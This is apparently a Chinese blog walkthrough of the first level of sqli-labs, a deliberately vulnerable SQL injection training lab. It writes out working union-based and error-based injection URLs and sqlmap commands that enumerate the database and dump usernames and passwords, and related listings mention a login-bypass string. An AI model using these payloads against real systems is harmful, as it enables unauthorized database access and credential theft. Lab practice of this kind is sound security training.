sqli-labs通关wp

最新推荐文章于 2024-05-18 15:04:49 发布
最新推荐文章于 2024-05-18 15:04:49 发布
阅读量6.4k 收藏 18
点赞数 6
分类专栏: kali sqlmap 文章标签: sql注入 sqli-labs
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/CliffordR/article/details/89220575
版权

第一关:

方法一:
在id=1后面加一个单引号后发现报错

然后把这个单引号注释掉试一下

使用'or 1=1--+

order by 查列数
页面显示正常了。存在注入,先查一下列数
http://127.0.0.1/sqli-labs/Less-1/?id=1%27%20order%20by%203--+
使用单引号闭合掉一个单引号,在用--+或#或%27注释掉一个,便可以使中间的order by 进行排序,语句如上,当使用order by 3的时候正常,使用order by 4的时候报错,就说明这里有三列数据

查完列数后,注意后面 id=非正确值

union select看返回值
构造payload:
http://127.0.0.1/sqli-labs/Less-1/?id=-1%27union%20select%201,2,3--+
发现2,3存在回显

暴库payload:
http://127.0.0.1/sqli-labs/Less-1/?id=-1%27union%20select%201,2,database()--+

数据库名字:security

爆表payload:
http://127.0.0.1/sqli-labs/Less-1/?id=-1%27union%20select%201,2,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database()--+

爆出的表名,其中users最可疑

爆字段payload:
http://127.0.0.1/sqli-labs/Less-1/?id=-1%27union%20select%201,2,group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=%27users%27%20--+


user_id,first_name,last_name,user,password,avatar,last_login,failed_login,id,username,password 这些都是users表中的字段名

爆值payload:
http://127.0.0.1/sqli-labs/Less-1/?id=-1%27union%20select%201,2,group_concat(username,0x3a,password)%20from%20users--+
payload解释:
0x3a:0x是十六进制的标志,3a是十进制的58,是ascii中的':',用以分割password和username

方法二:
手工报错型注入

检测报错型payload:

1

?id=1' 1=1--+ 正常
?id=1' 1=2--+ 报错
证明确实存在手工报错型注入

注意:id=正确值

报错注入:

当前表:

?id=1' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))) --+

字段:

?id=1' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'))) --+

?id=1' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users' and column_name not in ('user_id','first_name','last_name','user','avatar','last_login','failed_login')))) --+

值:

?id=1' and extractvalue(1,concat(0x7e,(select group_concat(username,0x3a,password) from users)))--+

同样使用not in显示其他值

?id=1' and extractvalue(1,concat(0x7e,(select group_concat(username,0x3a,password) from users where username not in ('Dumb','I-kill-you'))))--+

使用sqlmap:

爆表: 

sqlmap -u 10.101.143.198/sqli-labs/Less-1/?id=1 --technique UE --dbms mysql -D security --tables --batch -v 0

爆字段:

sqlmap -u 10.101.143.198/sqli-labs/Less-1/?id=1 --technique UE --dbms mysql -D security -T users --columns --batch -v 0

值:

sqlmap -u 10.101.143.198/sqli-labs/Less-1/?id=1 --technique UE --dbms mysql -D security -T users -C username,password --dump --batch -v 0

 

 

D-R0s1
关注
  • 6
    点赞
  • 18
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
DAY22:sqli-labs 靶场通关wp(Less01~~Less20)
qq_49433473的博客
08-04 1020
Sqli-labs靶场 1-20关通关手册,报错注入及其详细。
Sqli-labs WP
qq_41996851的博客
05-08 462
环境搭建 需要phpstudy以及sqli-labs源码。把sqli-labs源码放好后,启动phpstudy的Apache和Mysql,如果无法启动mysql,考虑关闭mysql/删除本地mysql。 更换phpstudy数据库密码,并修改sqli-labs数据库连接文件; ********\phpstudy_pro\WWW\range\sqli-labs\sql-connections\db-creds.inc 如果嫌路径麻烦可以考虑创建网站: 这样就可以用域名和端口号访问,这里会直接走本地DNS解
详细sqli-labs(1-20)通关讲解
最新发布
m0_57928318的博客
05-18 1072
获取数据库名时可以使用 left() 函数,这里使用 substr() 函数截取数据库名的每个字符,然后使用 ASCII() 函数判断这个字符的 ASCII 码值。我们可以看出,GET 方式和post 方式 的区别,GET方式 可以明显的 从 URL 中进行注入,POST可以在数据包中进行修改对应的字段来进行 SQL 注入。获取数据库名时,使用 LEFT() 函数进行穷举法的效率较低,使用 substr() 函数结合 ASCII() 函数进行判断可以使用二分法快速缩小范围。
Sqli-labs靶场搭建(适合新手小白围观)
weixin_72543266的博客
09-12 6869
本章是对SQL注入进行一个简单的回归,然后就是对于自己在搭建靶场中所遇到的一些问题的解决办法,以及进行安装步骤的总结,对于自己的自主配置和独立解决问题的能力是一种培养每日一言真正的有福之人,是经历极大的挫折磨难后,依然屹立不倒的人。一个人能承受的东西越多,他所能得到的馈赠才越多。
sqli-labs/Less-5/双查询注入&布尔盲注
m0_75178803的博客
04-20 234
数据库名database为security。可知是基于 1' 的注入。4.查询当前数据库下的所有表名。5.查询当前表下的所有列名。6.查询指定列名下的数据。经典的双查询注入语句。
sqllabs 闯关wp
wsitcj的博客
07-20 244
Less 1 首先先测试为字符型,并且干扰字符为 单引号 ,所以构造语句如下 http://192.168.9.128/sqli-labs/Less-1/?id=1%27%20--+ 爆字段 http://192.168.9.128/sqli-labs/Less-1/?id=1' order by 3--+ 爆表 不要忘了 group_concat 函数 http://192.168.9.128/sqli-labs/Less-1/?id=999' union select 1,group_con
Sqli-labs环境搭建教程(sql注入
Victor1889的博客
01-06 9192
Sqli-labs环境搭建教程(sql注入
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
windows环境下安装sqli-labs
11-04
Windows 环境下安装 sqli-labs 详细教程 Windows Server 2012 环境下安装 sqli-labs 需要具备一定的基础知识和环境准备。在这里,我们将详细介绍如何在 Windows Server 2012 环境下安装 sqli-labs。 环境准备 在...
sqli-labs.rar
12-22
sqli-labs是一个专门设计用于学习和练习SQL注入技术的平台,特别适合初学者了解和提升SQL注入防御技能。 首先,要搭建sqli-labs,你需要准备以下工具: 1. PHPstudy:一个集成的Web服务器环境,包括Apache、Nginx、...
SQL注入天书 sqli-labs
01-11
SQL注入天书 sqli-labs
安装sqli-labs
10-22
安装完成sqli-labs靶场环境后,可以根据关卡信息练习,结合write up(通关指南)和手工测试工具使用sqli-labs靶场环境。 总结 安装sqli-labs靶场环境可以提供一个安全和合法的环境来学习和实践Web应用安全。通过...
sqli-labs 漏洞平台靶场练习 总结 wp
Alexhirchi的博客
04-03 1325
文章目录题目-持续更新Less-1~10 GET型注入题Less11~22 POST型注入题Less23~32 WAF绕过数据库信息 题目-持续更新 Less-1~10 GET型注入题 ​ 基本的一些联合查询注入 Less-1.字符型 规定id=1,2,3 构造闭合 id=-1’ 内容 # Less-2.数字型 直接加SQL语句 id=-1 内容 Less-3.字符型 闭合方式是(‘ 内...
sqlilabs通关()
Forrest_bear的博客
05-24 1030
就像以下代码一样:隔离空格。
详细sqli-labs(1-65)通关讲解
热门推荐
dreamthe的博客
05-17 13万+
​ 如果刚开始接触sql注入,那么sqli-labs这个靶场会很适合你,里面包含了很多的情景,以及我们在sql注入的时候遇到的阻碍。本章将1-65关重点关卡进行详细讲解。代码基本上很全。如果靶场练习完了可以看我这篇SQL注入总结会更好掌握。​SQL注入非常详细总结_糊涂是福yyyy的博客-CSDN博客_sql注入数据包 ​...
Sqli-lab教程-史上最全详解(1-22通关
qq_52364123的博客
04-10 8689
sql注入集合
Sqlilab通关教程
weixin_62281892的博客
05-17 1575
第一关:基于单引号的字符型注入 目录 第一关:基于单引号的字符型注入 先进行输入参数?id=1' 出现报错说明发现注入点,判断该类型为字符注入 order by 判断数据库--表--表里面的数据的列进行排序(从1开始) union select 1,2,3 -- 判断数据显示点 select system_user() 显示系统用户 select version() 显示版本信息 select @@datadir 数据库的安装路径 *查库: select schema_na
web靶场 --- sqli-labs
L0g1c的博客
07-06 1316
SQL注入的本质是用户输入的数据被当作代码执行mysql语法:查库: 查表:查列:查字段: 查看是否有注入 确实存在SQL注入漏洞查看有多少列先使用 再使用 所以得到users表有3列查看哪些数据可以回显[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-drLNqXTv-1657118499948)(https://raw.githubusercontent.com/Ckingt-k/photos/main/image-20220706192047368.png)]查看当前数
sqli-labs通关28
03-05
sqli-labs是一个用于学习和练习SQL入的实验平台。通关28其中的一个关卡,下面是关于sqli-labs通关28的介绍: 在sqli-labs通关28中,你需要利用SQL注入漏洞来绕过登录验证,获取管理员权限。具体步骤如下: 1. 打开sqli-labs网站,找到通关28的页面。 2. 在登录框中输入任意用户名和密码,点击登录按钮。 3. 在URL中可以看到登录请求的参数,例如:`http://localhost/sqli-labs/Less-28/?id=1&Submit=Submit#`。 4. 在URL中的`id`参数处存在SQL注入漏洞,我们可以尝试利用这个漏洞进行攻击。 5. 输入`' or '1'='1`作为`id`参数的值,然后点击提交按钮。 6. 如果成功利用了SQL注入漏洞,你将会被认为是管理员身份登录成功,并且可以看到管理员的相关信息。 请注意,sqli-labs是一个用于学习和练习SQL注入的平台,仅供合法目的使用。在实际应用中,SQL注入是一种严重的安全漏洞,需要谨慎对待。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值